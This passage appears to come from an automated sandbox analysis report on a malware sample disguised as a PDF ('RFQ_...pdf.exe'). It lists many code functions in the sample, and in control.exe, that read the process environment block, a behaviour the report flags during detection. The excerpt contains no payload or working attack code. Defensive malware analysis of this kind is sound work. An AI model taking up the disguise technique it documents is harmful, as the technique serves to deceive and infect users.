          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E746D mov eax, dword ptr fs:[00000030h]2_2_009E746D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h]2_2_00A5C450
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h]2_2_00A5C450
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h]2_2_009FFD9B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h]2_2_009FFD9B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A905AC mov eax, dword ptr fs:[00000030h]2_2_00A905AC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A905AC mov eax, dword ptr fs:[00000030h]2_2_00A905AC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]2_2_009C2D8A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]2_2_009C2D8A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]2_2_009C2D8A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]2_2_009C2D8A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h]2_2_009C2D8A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]2_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]2_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]2_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F2581 mov eax, dword ptr fs:[00000030h]2_2_009F2581
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]2_2_009F1DB5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]2_2_009F1DB5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F1DB5 mov eax, dword ptr fs:[00000030h]2_2_009F1DB5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F35A1 mov eax, dword ptr fs:[00000030h]2_2_009F35A1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A8FDE2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A8FDE2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A8FDE2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A8FDE2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A78DF1 mov eax, dword ptr fs:[00000030h]2_2_00A78DF1
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov ecx, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A46DC9 mov eax, dword ptr fs:[00000030h]2_2_00A46DC9
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DD5E0 mov eax, dword ptr fs:[00000030h]2_2_009DD5E0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DD5E0 mov eax, dword ptr fs:[00000030h]2_2_009DD5E0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8E539 mov eax, dword ptr fs:[00000030h]2_2_00A8E539
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A4A537 mov eax, dword ptr fs:[00000030h]2_2_00A4A537
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98D34 mov eax, dword ptr fs:[00000030h]2_2_00A98D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]2_2_009F4D3B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]2_2_009F4D3B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h]2_2_009F4D3B
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h]2_2_009D3D34
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CAD30 mov eax, dword ptr fs:[00000030h]2_2_009CAD30
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009E7D50 mov eax, dword ptr fs:[00000030h]2_2_009E7D50
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A03D43 mov eax, dword ptr fs:[00000030h]2_2_00A03D43
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A43540 mov eax, dword ptr fs:[00000030h]2_2_00A43540
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A73D40 mov eax, dword ptr fs:[00000030h]2_2_00A73D40
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]2_2_009EC577
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h]2_2_009EC577
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A446A7 mov eax, dword ptr fs:[00000030h]2_2_00A446A7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]2_2_00A90EA5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]2_2_00A90EA5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h]2_2_00A90EA5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FE87 mov eax, dword ptr fs:[00000030h]2_2_00A5FE87
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F36CC mov eax, dword ptr fs:[00000030h]2_2_009F36CC
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]2_2_00A7FEC0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A08EC7 mov eax, dword ptr fs:[00000030h]2_2_00A08EC7
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F16E0 mov ecx, dword ptr fs:[00000030h]2_2_009F16E0
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98ED6 mov eax, dword ptr fs:[00000030h]2_2_00A98ED6
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D76E2 mov eax, dword ptr fs:[00000030h]2_2_009D76E2
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA61C mov eax, dword ptr fs:[00000030h]2_2_009FA61C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA61C mov eax, dword ptr fs:[00000030h]2_2_009FA61C
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A7FE3F mov eax, dword ptr fs:[00000030h]2_2_00A7FE3F
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]2_2_009CC600
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]2_2_009CC600
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h]2_2_009CC600
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009F8E00 mov eax, dword ptr fs:[00000030h]2_2_009F8E00
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A81608 mov eax, dword ptr fs:[00000030h]2_2_00A81608
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009CE620 mov eax, dword ptr fs:[00000030h]2_2_009CE620
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D7E41 mov eax, dword ptr fs:[00000030h]2_2_009D7E41
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AE44 mov eax, dword ptr fs:[00000030h]2_2_00A8AE44
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A8AE44 mov eax, dword ptr fs:[00000030h]2_2_00A8AE44
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]2_2_009EAE73
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]2_2_009EAE73
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]2_2_009EAE73
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]2_2_009EAE73
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EAE73 mov eax, dword ptr fs:[00000030h]2_2_009EAE73
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D766D mov eax, dword ptr fs:[00000030h]2_2_009D766D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009D8794 mov eax, dword ptr fs:[00000030h]2_2_009D8794
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]2_2_00A47794
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]2_2_00A47794
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A47794 mov eax, dword ptr fs:[00000030h]2_2_00A47794
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A037F5 mov eax, dword ptr fs:[00000030h]2_2_00A037F5
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009EF716 mov eax, dword ptr fs:[00000030h]2_2_009EF716
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA70E mov eax, dword ptr fs:[00000030h]2_2_009FA70E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FA70E mov eax, dword ptr fs:[00000030h]2_2_009FA70E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]2_2_00A9070D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h]2_2_00A9070D
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009FE730 mov eax, dword ptr fs:[00000030h]2_2_009FE730
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]2_2_009C4F2E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h]2_2_009C4F2E
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]2_2_00A5FF10
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h]2_2_00A5FF10
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_00A98F6A mov eax, dword ptr fs:[00000030h]2_2_00A98F6A
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DEF40 mov eax, dword ptr fs:[00000030h]2_2_009DEF40
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 2_2_009DFF60 mov eax, dword ptr fs:[00000030h]2_2_009DFF60
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B746D mov eax, dword ptr fs:[00000030h]7_2_047B746D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA44B mov eax, dword ptr fs:[00000030h]7_2_047CA44B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868CD6 mov eax, dword ptr fs:[00000030h]7_2_04868CD6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CBC2C mov eax, dword ptr fs:[00000030h]7_2_047CBC2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]7_2_04816CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]7_2_04816CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816CF0 mov eax, dword ptr fs:[00000030h]7_2_04816CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048514FB mov eax, dword ptr fs:[00000030h]7_2_048514FB
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04851C06 mov eax, dword ptr fs:[00000030h]7_2_04851C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]7_2_0486740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]7_2_0486740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0486740D mov eax, dword ptr fs:[00000030h]7_2_0486740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]7_2_04816C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]7_2_04816C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]7_2_04816C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816C0A mov eax, dword ptr fs:[00000030h]7_2_04816C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]7_2_0482C450
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0482C450 mov eax, dword ptr fs:[00000030h]7_2_0482C450
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A849B mov eax, dword ptr fs:[00000030h]7_2_047A849B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]7_2_047BC577
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BC577 mov eax, dword ptr fs:[00000030h]7_2_047BC577
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]7_2_048605AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048605AC mov eax, dword ptr fs:[00000030h]7_2_048605AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B7D50 mov eax, dword ptr fs:[00000030h]7_2_047B7D50
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D3D43 mov eax, dword ptr fs:[00000030h]7_2_047D3D43
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]7_2_047C4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]7_2_047C4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C4D3B mov eax, dword ptr fs:[00000030h]7_2_047C4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov ecx, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04816DC9 mov eax, dword ptr fs:[00000030h]7_2_04816DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479AD30 mov eax, dword ptr fs:[00000030h]7_2_0479AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A3D34 mov eax, dword ptr fs:[00000030h]7_2_047A3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]7_2_0485FDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]7_2_0485FDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]7_2_0485FDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485FDE2 mov eax, dword ptr fs:[00000030h]7_2_0485FDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04848DF1 mov eax, dword ptr fs:[00000030h]7_2_04848DF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]7_2_047AD5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047AD5E0 mov eax, dword ptr fs:[00000030h]7_2_047AD5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04868D34 mov eax, dword ptr fs:[00000030h]7_2_04868D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0481A537 mov eax, dword ptr fs:[00000030h]7_2_0481A537
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0485E539 mov eax, dword ptr fs:[00000030h]7_2_0485E539
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04813540 mov eax, dword ptr fs:[00000030h]7_2_04813540
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]7_2_047C1DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]7_2_047C1DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C1DB5 mov eax, dword ptr fs:[00000030h]7_2_047C1DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C35A1 mov eax, dword ptr fs:[00000030h]7_2_047C35A1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]7_2_047CFD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CFD9B mov eax, dword ptr fs:[00000030h]7_2_047CFD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]7_2_04792D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]7_2_04792D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04792D8A mov eax, dword ptr fs:[00000030h]7_2_04792D8A
